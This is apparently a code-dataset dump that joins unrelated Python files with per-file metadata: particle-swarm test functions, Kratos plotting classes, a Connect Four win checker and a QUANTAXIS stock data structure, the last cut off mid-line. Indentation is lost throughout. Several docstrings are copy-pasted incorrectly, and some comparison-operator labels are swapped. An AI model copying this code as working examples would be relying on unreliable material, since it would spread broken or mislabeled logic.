'O': 'O: Post-translational modification, protein turnover, and chaperones',
'P': 'P: Inorganic ion transport and metabolism',
'Q': 'Q: Secondary metabolites biosynthesis, transport, and catabolism',
'T': 'T: Signal transduction mechanisms',
'U': 'U: Intracellular trafficking, secretion, and vesicular transport',
'V': 'V: Defense mechanisms',
'W': 'W: Extracellular structures',
'Y': 'Y: Nuclear structure',
'Z': 'Z: Cytoskeleton',
'R': 'R: General function prediction only',
'S': 'S: Function Unknown',
'?': 'Not predicted'} | 52.129412 | 76 | 0.610246 | 1,381 | 8,862 | 3.481535 | 0.154236 | 0.224626 | 0.389351 | 0.104825 | 0.702163 | 0.702163 | 0.702163 | 0.702163 | 0.702163 | 0.702163 | 0 | 0.490969 | 0.212819 | 8,862 | 170 | 77 | 52.129412 | 0.198251 | 0.011397 | 0 | 0.103896 | 0 | 0 | 0.644122 | 0.01131 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.006494 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
# File: Numpy Vectorize/opfunctions.py, repo zeeshanahmad10809/ParticleSwarmOptimiza (Apache-2.0)
import numpy as np


def sphere(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
_sum = 0.0
for _x in particle.x:
_sum = _sum + _x ** 2
return _sum
def greiwank(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def rastrigin(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def ackley(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def rosenbrock(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def schwefel(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def michalewicz(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def dejong(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def step(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def levy(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def circle(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def cosine_mixture(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def exponential(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
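# A minimal, self-contained sanity sketch for two of the benchmark formulas
# used in this module. `_sphere`, `_rastrigin` and the plain-list inputs are
# illustrative assumptions; the module's own functions take Particle objects.
import math

def _sphere(x):
    # f(x) = sum(x_i ** 2); global minimum 0 at the origin.
    return sum(v * v for v in x)

def _rastrigin(x):
    # f(x) = 10 * n + sum(x_i ** 2 - 10 * cos(2 * pi * x_i)).
    return 10.0 * len(x) + sum(v * v - 10.0 * math.cos(2.0 * math.pi * v) for v in x)

assert _sphere([1.0, 2.0, 3.0]) == 14.0   # 1 + 4 + 9
assert _rastrigin([0.0] * 5) == 0.0       # value at the global minimum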
# File: applications/MultiScaleApplication/python_scripts/TK_Plot.py, repo lcirrott/Kratos (BSD-4-Clause)
from __future__ import print_function, absolute_import, division  # makes KratosMultiphysics backward compatible with Python 2.6 and 2.7
from KratosMultiphysics import *
from KratosMultiphysics.MultiScaleApplication import *
import os
import glob
class GNUPlot_Folder:
def __init__(self, Name):
self.Name = Name
def Initialize(self, Model):
if not os.path.exists(self.Name):
os.mkdir(self.Name)
def OnBeforeSolutionStage(self, Model):
pass
def OnSolutionStageCompleted(self, Model):
pass
def OnBeforeSolutionStep(self, Model):
pass
def OnSolutionStepCompleted(self, Model):
pass
def Finalize(self, Model):
pass
class GNUPlot_Nodal:
def __init__(self,
BaseName=None,
Name=None,
VarX=None,
VarY=None,
NodeX=None,
NodeY=None,
Frequency = None,
):
self.BaseName = BaseName
self.Name = Name
self.VarX = VarX
self.VarY = VarY
self.NodeX = NodeX
self.NodeY = NodeY
self.ofile = None
self.Frequency = Frequency
self.Tn = None
def __check_write_freq(self,t):
r = True
f = self.Frequency
if(f is not None):
if(self.Tn is None):
self.Tn = t
else:
dt = t-self.Tn
if(dt >= f):
self.Tn = t
else:
r = False
return r
def Initialize(self, Model):
if not os.path.exists(self.BaseName):
os.mkdir(self.BaseName)
filename = self.BaseName + os.sep + self.Name + "_" + str(self.NodeX) + "_" + str(self.NodeY) + ".grf"
self.ofile = open(filename, "w+")
xx = Model.Nodes[self.NodeX].GetSolutionStepValue(self.VarX)
yy = Model.Nodes[self.NodeY].GetSolutionStepValue(self.VarY)
self.ofile.write(str(xx) + " " + str(yy) + '\n')
self.ofile.flush()
self.Tn = Model.ProcessInfo[TIME]
def OnBeforeSolutionStage(self, Model):
pass
def OnSolutionStageCompleted(self, Model):
pass
def OnBeforeSolutionStep(self, Model):
pass
def OnSolutionStepCompleted(self, Model):
t = Model.ProcessInfo[TIME]
if( (t == Model.ProcessInfo[END_TIME]) or (self.__check_write_freq(t)) ):
xx = Model.Nodes[self.NodeX].GetSolutionStepValue(self.VarX)
yy = Model.Nodes[self.NodeY].GetSolutionStepValue(self.VarY)
self.ofile.write(str(xx) + " " + str(yy) + '\n')
self.ofile.flush()
def Finalize(self, Model):
self.ofile.close()
class GNUPlot_Nodal_Multiple:
def __init__(self,
BaseName=None,
Name=None,
VarX=None,
VarY=None,
NodesX=None,
NodesY=None,
FactorX=1.0,
FactorY=1.0,
XSumFactor=1.0,
YSumFactor=1.0,
Frequency = None,
):
self.BaseName = BaseName
self.Name = Name
self.VarX = VarX
self.VarY = VarY
self.NodesX = NodesX
self.NodesY = NodesY
self.FactorX = FactorX
self.FactorY = FactorY
self.ofile = None
self.XSumFactor=XSumFactor
self.YSumFactor=YSumFactor
self.Frequency = Frequency
self.Tn = None
def __check_write_freq(self,t):
r = True
f = self.Frequency
if(f is not None):
if(self.Tn is None):
self.Tn = t
else:
dt = t-self.Tn
if(dt >= f):
self.Tn = t
else:
r = False
return r
def Initialize(self, Model):
if not os.path.exists(self.BaseName):
os.mkdir(self.BaseName)
# filename = self.BaseName + os.sep + self.Name + ".grf"
filename = self.BaseName + os.sep + self.Name
self.ofile = open(filename, "w+")
sum_x = 0.0
sum_y = 0.0
x_sum_fac = self.XSumFactor
y_sum_fac = self.YSumFactor
for i in self.NodesX:
sum_x += x_sum_fac*(Model.Nodes[i].GetSolutionStepValue(self.VarX))
for i in self.NodesY:
sum_y += y_sum_fac*(Model.Nodes[i].GetSolutionStepValue(self.VarY))
self.ofile.write(str(self.FactorX*sum_x) + " " + str(self.FactorY*sum_y) + '\n')
self.ofile.flush()
self.Tn = Model.ProcessInfo[TIME]
def OnBeforeSolutionStage(self, Model):
pass
def OnSolutionStageCompleted(self, Model):
pass
def OnBeforeSolutionStep(self, Model):
pass
def OnSolutionStepCompleted(self, Model):
t = Model.ProcessInfo[TIME]
if( (t == Model.ProcessInfo[END_TIME]) or (self.__check_write_freq(t)) ):
sum_x = 0.0
sum_y = 0.0
for i in self.NodesX:
sum_x += Model.Nodes[i].GetSolutionStepValue(self.VarX)
for i in self.NodesY:
sum_y += Model.Nodes[i].GetSolutionStepValue(self.VarY)
self.ofile.write(str(self.FactorX*sum_x) + " " + str(self.FactorY*sum_y) + '\n')
self.ofile.flush()
def Finalize(self, Model):
self.ofile.close()
class GNUPlot_Elemental:
def __init__(self,
BaseName=None,
Name=None,
VarX=None,
VarY=None,
ComponentX=None,
ComponentY=None,
ElementID=None,
GpID=None,
Frequency = None,
):
self.BaseName = BaseName
self.Name = Name
self.VarX = VarX
self.VarY = VarY
self.ElementID = ElementID
self.GpID = GpID
self.ofile = None
self.ComponentX = ComponentX
self.ComponentY = ComponentY
self.Frequency = Frequency
self.Tn = None
def __check_write_freq(self,t):
r = True
f = self.Frequency
if(f is not None):
if(self.Tn is None):
self.Tn = t
else:
dt = t-self.Tn
if(dt >= f):
self.Tn = t
else:
r = False
return r
def Initialize(self, Model):
if not os.path.exists(self.BaseName):
os.mkdir(self.BaseName)
filename = self.BaseName + os.sep + self.Name + "_" + str(self.ElementID) + "_" + str(self.GpID) + ".grf"
self.ofile = open(filename, "w+")
xx = 0.0
yy = 0.0
self.ofile.write(str(xx) + " " + str(yy) + '\n')
self.ofile.flush()
self.Tn = Model.ProcessInfo[TIME]
def OnBeforeSolutionStage(self, Model):
pass
def OnSolutionStageCompleted(self, Model):
pass
def OnBeforeSolutionStep(self, Model):
pass
def OnSolutionStepCompleted(self, Model):
t = Model.ProcessInfo[TIME]
if( (t == Model.ProcessInfo[END_TIME]) or (self.__check_write_freq(t)) ):
allx = Model.Elements[self.ElementID].GetValuesOnIntegrationPoints(self.VarX, Model.ProcessInfo)
ally = Model.Elements[self.ElementID].GetValuesOnIntegrationPoints(self.VarY, Model.ProcessInfo)
mx = allx[self.GpID]
my = ally[self.GpID]
if self.ComponentX is None:
xx = mx
else:
xx = mx[self.ComponentX]
if self.ComponentY is None:
yy = my
else:
yy = my[self.ComponentY]
self.ofile.write(str(xx) + " " + str(yy) + '\n')
self.ofile.flush()
def Finalize(self, Model):
self.ofile.close()
class Plot_StrainVsStress:
def __init__(self,
BaseName=None,
Name=None,
Dim=None,
VarX=None,
VarY=None,
ComponentX=None,
ComponentY=None,
ElementID=None,
GpID=None,
):
self.BaseName = BaseName
self.Name = Name
self.Dim = Dim
self.VarX = VarX
self.VarY = VarY
self.ElementID = ElementID
self.GpID = GpID
self.ofile = None
self.ComponentX = ComponentX
self.ComponentY = ComponentY
def Initialize(self, Model):
if not os.path.exists(self.BaseName):
os.mkdir(self.BaseName)
filename = self.BaseName + os.sep + self.Name + "_" + str(self.ElementID) + "_" + str(self.GpID) + ".grf"
self.ofile = open(filename, "w+")
xx = 0.0
yy = 0.0
self.ofile.write(str(xx) + " " + str(yy) + '\n')
self.ofile.flush()
def OnBeforeSolutionStage(self, Model):
pass
def OnSolutionStageCompleted(self, Model):
pass
def OnBeforeSolutionStep(self, Model):
pass
def OnSolutionStepCompleted(self, Model):
allx = Model.Elements[self.ElementID].GetValuesOnIntegrationPoints(self.VarX, Model.ProcessInfo)
ally = Model.Elements[self.ElementID].GetValuesOnIntegrationPoints(self.VarY, Model.ProcessInfo)
mx = allx[self.GpID]
my = ally[self.GpID]
if self.ComponentX is None:
xx = mx
else:
xx = mx[self.ComponentX]
if self.ComponentY is None:
yy = my
else:
yy = my[self.ComponentY]
self.ofile.write(str(xx) + " " + str(yy) + '\n')
self.ofile.flush()
def Finalize(self, Model):
self.ofile.close()
class GNUPlot_YieldSurf2D:
def __init__(self,
BaseName=None,
Name=None,
ElementID=None,
GpID=None,
):
self.BaseName = BaseName
self.Name = Name
self.ElementID = ElementID
self.GpID = GpID
def Initialize(self, Model):
if not os.path.exists(self.BaseName):
os.mkdir(self.BaseName)
def OnBeforeSolutionStage(self, Model):
pass
def OnSolutionStageCompleted(self, Model):
pass
def OnBeforeSolutionStep(self, Model):
pass
def OnSolutionStepCompleted(self, Model):
time = Model.ProcessInfo[TIME]
stime = str(time).replace('.','_')
filename = self.BaseName + os.sep + self.Name + "_" + stime + ".grf"
ofile = open(filename, "w+")
allx = Model.Elements[self.ElementID].GetValuesOnIntegrationPoints(YIELD_SURFACE_DATA_2D_X, Model.ProcessInfo)
ally = Model.Elements[self.ElementID].GetValuesOnIntegrationPoints(YIELD_SURFACE_DATA_2D_Y, Model.ProcessInfo)
xx = allx[self.GpID]
yy = ally[self.GpID]
for i in range(len(xx)):
x = str(xx[i])
y = str(yy[i])
ofile.write(x + " " + y + '\n')
ofile.close()
def Finalize(self, Model):
pass
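# A self-contained sketch of the write-frequency throttle that the plot
# classes above share via __check_write_freq. The `_FreqGate` name and the
# bare float timestamps are illustrative assumptions; the real classes read
# TIME from Model.ProcessInfo.
class _FreqGate:
    def __init__(self, frequency=None):
        self.frequency = frequency
        self.tn = None

    def should_write(self, t):
        # Always write when no frequency is configured; otherwise write only
        # when at least `frequency` time units elapsed since the last write.
        if self.frequency is None:
            return True
        if self.tn is None or t - self.tn >= self.frequency:
            self.tn = t
            return True
        return False

_gate = _FreqGate(frequency=1.0)
assert _gate.should_write(0.0) is True    # first call records the time
assert _gate.should_write(0.5) is False   # throttled: only 0.5 elapsed
assert _gate.should_write(1.2) is True    # 1.2 >= 1.0 elapsed, write again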
# File: src/sections/testing.py, repo clickthisnick/readme-generator (MIT)
# -*- coding: utf-8 -*-
def generate():
return "TODO"
# File: src/graph_transpiler/webdnn/encoder/__init__.py, repo steerapi/webdnn (MIT)
from webdnn.encoder import constant_encoder
from webdnn.encoder import constant_encoder_eightbit
from webdnn.encoder import constant_encoder_raw
# File: win_state.py, repo ajermk/connect4-with-AI (MIT)
import globals as gl
def winning_state(board, piece):
    return (winning_state_hor(board, piece) or
            winning_state_vert(board, piece) or
            winning_state_diag1(board, piece) or
            winning_state_diag2(board, piece))
def winning_state_vert(board, piece):
    # check vertical: consecutive pieces stacked in a single column
for colum in range(gl.COLUMN_COUNT):
consecutive = 0
for rows in range(gl.ROW_COUNT):
if board[rows][colum] == piece:
consecutive += 1
else:
consecutive = 0
if consecutive == gl.WINNING_CONSECUTIVE_PIECES:
return True
return False
def winning_state_hor(board, piece):
    # check horizontal: consecutive pieces across a single row
for rows in range(gl.ROW_COUNT):
consecutive = 0
for colum in range(gl.COLUMN_COUNT):
if board[rows][colum] == piece:
consecutive += 1
else:
consecutive = 0
if consecutive == gl.WINNING_CONSECUTIVE_PIECES:
return True
return False
def winning_state_diag1(board, piece):
# check \
for cols in range(gl.COLUMN_COUNT):
consecutive = 0
for rows in range(gl.ROW_COUNT):
if ((cols+rows < gl.COLUMN_COUNT) and board[rows][cols+rows] == piece):
consecutive += 1
else:
consecutive = 0
if consecutive >= gl.WINNING_CONSECUTIVE_PIECES:
return True
for cols in range(gl.COLUMN_COUNT):
consecutive = 0
for rows in range(gl.ROW_COUNT):
if ((cols+rows < gl.ROW_COUNT) and board[rows+cols][rows] == piece):
consecutive += 1
else:
consecutive = 0
if consecutive >= gl.WINNING_CONSECUTIVE_PIECES:
return True
return False
def winning_state_diag2(board, piece):
# check /
for cols in range(gl.COLUMN_COUNT):
consecutive = 0
for rows in range(gl.ROW_COUNT):
if ((cols-rows >= 0) and board[rows][cols-rows] == piece):
consecutive += 1
else:
consecutive = 0
if consecutive >= gl.WINNING_CONSECUTIVE_PIECES:
return True
for rows in range(gl.ROW_COUNT):
consecutive = 0
iteration = 0
for cols in range((gl.COLUMN_COUNT-1), -1, -1):
if ((rows+iteration < gl.ROW_COUNT) and board[rows+iteration][cols] == piece):
consecutive += 1
else:
consecutive = 0
if consecutive >= gl.WINNING_CONSECUTIVE_PIECES:
return True
iteration += 1
return False
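# A self-contained sketch of the scan pattern used by the four checks above:
# each walks a line of cells and counts consecutive pieces. `_has_run`, the
# default of 4, and the demo rows are illustrative assumptions; the module
# itself reads its threshold from gl.WINNING_CONSECUTIVE_PIECES.
def _has_run(cells, piece, need=4):
    # True if `cells` contains at least `need` consecutive `piece` entries.
    consecutive = 0
    for c in cells:
        consecutive = consecutive + 1 if c == piece else 0
        if consecutive >= need:
            return True
    return False

assert _has_run([0, 1, 1, 1, 1, 0, 0], 1) is True    # four in a row
assert _has_run([1, 1, 0, 1, 1, 0, 0], 1) is False   # only broken runs of two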
# File: QUANTAXIS/QAData/QADataStruct.py, repo paracats/QUANTAXIS (MIT)
# coding: utf-8
"""
Defines some extensible data structures
for convenient serialization and mutual conversion
"""
import itertools
from functools import reduce
import numpy as np
import pandas as pd
import six
import talib
from QUANTAXIS.QAData.data_fq import QA_data_stock_to_fq
from QUANTAXIS.QAData.data_resample import QA_data_tick_resample
from QUANTAXIS.QAData.proto import (stock_day_pb2, # protobuf import
stock_min_pb2)
from QUANTAXIS.QAIndicator import EMA, HHV, LLV, SMA
from QUANTAXIS.QAUtil import (QA_Setting, QA_util_log_info,
QA_util_to_json_from_pandas, trade_date_sse)
class __stock_base():
def __init__(self, DataFrame):
self.data = DataFrame
self.type = ''
self.if_fq = 'bfq'
self.mongo_coll = QA_Setting.client.quantaxis
self.open = DataFrame['open']
self.high = DataFrame['high']
self.low = DataFrame['low']
self.close = DataFrame['close']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
        if 'date' in self.data.index.names:
self.date = self.data.index.levels[self.data.index.names.index(
'date')]
self.datetime = self.date
        elif 'datetime' in self.data.index.names:
self.datetime = self.data.index.levels[self.data.index.names.index(
'datetime')]
            self.date = self.datetime.map(lambda x: str(x)[0:10])
self.index = DataFrame.index
self.code = self.data.index.levels[self.data.index.names.index('code')]
class stock_hq_base(__stock_base):
def __init__(self, DataFrame):
self.data = DataFrame
self.type = ''
self.if_fq = 'bfq'
self.mongo_coll = QA_Setting.client.quantaxis
self.open = DataFrame['open']
self.high = DataFrame['high']
self.low = DataFrame['low']
self.close = DataFrame['close']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
if 'date' in self.data.index.names:
self.date = self.data.index.levels[self.data.index.names.index(
'date')]
self.datetime = self.date
elif 'datetime' in self.data.index.names:
self.datetime = self.data.index.levels[self.data.index.names.index(
'datetime')]
self.date = self.data['date']
self.index = DataFrame.index
self.code = self.data.index.levels[self.data.index.names.index('code')]
def len(self):
return len(self.data)
def reverse(self):
return stock_hq_base(self.data[::-1])
def show(self):
return QA_util_log_info(self.data)
def query(self, query_text):
return self.data.query(query_text)
def to_list(self):
return np.asarray(self.data).tolist()
def to_pd(self):
return self.data
def to_numpy(self):
return np.asarray(self.data)
def to_json(self):
return QA_util_to_json_from_pandas(self.data)
def sync_status(self, stock_hq_base):
        'Fixed state must stay in sync, especially when creating a new datastruct'
(stock_hq_base.if_fq, stock_hq_base.type, stock_hq_base.mongo_coll) = (
self.if_fq, self.type, self.mongo_coll)
return stock_hq_base
def splits(self):
if self.type in ['stock_day', 'index_day']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['date', 'code'], drop=False)), self.code))))
elif self.type in ['stock_min','index_min']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['datetime', 'code'], drop=False)), self.code))))
def add_func(self, func, *arg, **kwargs):
return self.sync_status(stock_hq_base(pd.concat(list(map(lambda x: func(
self.data[self.data['code'] == x], *arg, **kwargs), self.code)))))
def pivot(self, column_):
assert isinstance(column_, str)
try:
return self.data.pivot(index='datetime', columns='code', values=column_)
except:
return self.data.pivot(index='date', columns='code', values=column_)
def select_time(self, start, end):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(stock_hq_base(self.data[self.data['date'] >= start][self.data['date'] <= end].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(stock_hq_base(self.data[self.data['datetime'] >= start][self.data['datetime'] <= end].set_index(['datetime', 'code'], drop=False)))
def select_time_with_gap(self, time, gap, method):
if method in ['gt', '>=']:
def __gt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] > time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] > time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(stock_hq_base(pd.concat(list(map(lambda x: __gt(x), self.splits())))))
elif method in ['gte', '>']:
def __gte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] >= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] >= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(stock_hq_base(pd.concat(list(map(lambda x: __gte(x), self.splits())))))
elif method in ['lt', '<']:
def __lt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] < time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] < time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(stock_hq_base(pd.concat(list(map(lambda x: __lt(x), self.splits())))))
elif method in ['lte', '<=']:
def __lte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] <= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] <= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(stock_hq_base(pd.concat(list(map(lambda x: __lte(x), self.splits())))))
elif method in ['e', '==', '=', 'equal']:
def __eq(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] == time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] == time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(stock_hq_base(pd.concat(list(map(lambda x: __eq(x), self.splits())))))
def select_code(self, code):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(stock_hq_base(self.data[self.data['code'] == code].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(stock_hq_base(self.data[self.data['code'] == code].set_index(['datetime', 'code'], drop=False)))
def get_bar(self, code, time):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(stock_hq_base((self.data[self.data['code'] == code])[self.data['date'] == str(time)[0:10]].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(stock_hq_base((self.data[self.data['code'] == code])[self.data['datetime'] == str(time)[0:19]].set_index(['datetime', 'code'], drop=False)))
class QA_DataStruct_Index_day(stock_hq_base):
    'Custom daily-bar data structure'
def __init__(self, DataFrame):
self.data = DataFrame
self.type = 'index_day'
self.if_fq = ''
self.mongo_coll = QA_Setting.client.quantaxis.stock_day
self.open = DataFrame['open']
self.high = DataFrame['high']
self.low = DataFrame['low']
self.close = DataFrame['close']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
self.date = self.data.index.levels[self.data.index.names.index('date')]
self.index = DataFrame.index
self.code = self.data.index.levels[self.data.index.names.index('code')]
def len(self):
return len(self.data)
def reverse(self):
return QA_DataStruct_Index_day(self.data[::-1])
def show(self):
return QA_util_log_info(self.data)
def query(self, query_text):
return self.data.query(query_text)
def to_list(self):
return np.asarray(self.data).tolist()
def to_pd(self):
return self.data
def to_numpy(self):
return np.asarray(self.data)
def to_json(self):
return QA_util_to_json_from_pandas(self.data)
def sync_status(self, QA_DataStruct_Index_day):
        'Fixed state must stay in sync, especially when creating a new datastruct'
(QA_DataStruct_Index_day.if_fq, QA_DataStruct_Index_day.type, QA_DataStruct_Index_day.mongo_coll) = (
self.if_fq, self.type, self.mongo_coll)
return QA_DataStruct_Index_day
def splits(self):
if self.type in ['stock_day', 'index_day']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['date', 'code'], drop=False)), self.code))))
elif self.type in ['stock_min','index_min']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['datetime', 'code'], drop=False)), self.code))))
def add_func(self, func, *arg, **kwargs):
return self.sync_status(QA_DataStruct_Index_day(pd.concat(list(map(lambda x: func(
self.data[self.data['code'] == x], *arg, **kwargs), self.code)))))
def pivot(self, column_):
assert isinstance(column_, str)
try:
return self.data.pivot(index='datetime', columns='code', values=column_)
except:
return self.data.pivot(index='date', columns='code', values=column_)
def select_time(self, start, end):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Index_day(self.data[self.data['date'] >= start][self.data['date'] <= end].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Index_day(self.data[self.data['datetime'] >= start][self.data['datetime'] <= end].set_index(['datetime', 'code'], drop=False)))
def select_time_with_gap(self, time, gap, method):
if method in ['gt', '>=']:
def __gt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] > time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] > time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_day(pd.concat(list(map(lambda x: __gt(x), self.splits())))))
elif method in ['gte', '>']:
def __gte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] >= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] >= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_day(pd.concat(list(map(lambda x: __gte(x), self.splits())))))
elif method in ['lt', '<']:
def __lt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] < time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] < time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_day(pd.concat(list(map(lambda x: __lt(x), self.splits())))))
elif method in ['lte', '<=']:
def __lte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] <= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] <= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_day(pd.concat(list(map(lambda x: __lte(x), self.splits())))))
elif method in ['e', '==', '=', 'equal']:
def __eq(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] == time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] == time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_day(pd.concat(list(map(lambda x: __eq(x), self.splits())))))
def select_code(self, code):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Index_day(self.data[self.data['code'] == code].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Index_day(self.data[self.data['code'] == code].set_index(['datetime', 'code'], drop=False)))
def get_bar(self, code, time):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Index_day((self.data[self.data['code'] == code])[self.data['date'] == str(time)[0:10]].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Index_day((self.data[self.data['code'] == code])[self.data['datetime'] == str(time)[0:19]].set_index(['datetime', 'code'], drop=False)))
class QA_DataStruct_Index_min(stock_hq_base):
    'Custom minute-bar data structure'
def __init__(self, DataFrame):
self.type = 'index_min'
self.if_fq = ''
self.mongo_coll = QA_Setting.client.quantaxis.stock_min
self.open = DataFrame['open']
self.high = DataFrame['high']
self.low = DataFrame['low']
self.close = DataFrame['close']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
self.date = DataFrame['date']
self.data = DataFrame
self.datetime = self.data.index.levels[self.data.index.names.index(
'datetime')]
self.index = DataFrame.index
self.code = self.data.index.levels[self.data.index.names.index('code')]
def len(self):
return len(self.data)
def reverse(self):
return QA_DataStruct_Index_min(self.data[::-1])
def show(self):
return QA_util_log_info(self.data)
def query(self, query_text):
return self.data.query(query_text)
def to_list(self):
return np.asarray(self.data).tolist()
def to_pd(self):
return self.data
def to_numpy(self):
return np.asarray(self.data)
def to_json(self):
return QA_util_to_json_from_pandas(self.data)
def sync_status(self, QA_DataStruct_Index_min):
'Fixed state must be kept in sync, especially when creating a new datastruct'
(QA_DataStruct_Index_min.if_fq, QA_DataStruct_Index_min.type, QA_DataStruct_Index_min.mongo_coll) = (
self.if_fq, self.type, self.mongo_coll)
return QA_DataStruct_Index_min
def splits(self):
if self.type in ['stock_day', 'index_day']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['date', 'code'], drop=False)), self.code))))
elif self.type in ['stock_min','index_min']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
